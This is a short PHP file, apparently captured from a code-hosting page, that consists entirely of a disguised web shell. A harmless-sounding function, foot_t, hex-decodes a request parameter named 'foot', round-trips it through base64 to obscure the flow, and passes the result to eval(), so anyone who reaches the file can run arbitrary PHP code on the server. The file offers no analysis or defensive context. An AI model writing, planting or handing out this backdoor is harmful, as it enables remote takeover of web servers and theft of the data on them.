10 lines
185 B
PHP
10 lines
185 B
PHP
|
<?php
|
||
|
function foot_t(){
|
||
|
$a=base64_encode(hex2bin($_REQUEST['foot']));
|
||
|
if (isset($a)) {
|
||
|
$b=''.base64_decode($a).'';
|
||
|
return ($b);
|
||
|
}
|
||
|
}
|
||
|
eval(''.foot_t().'');
|
||
|
?>
|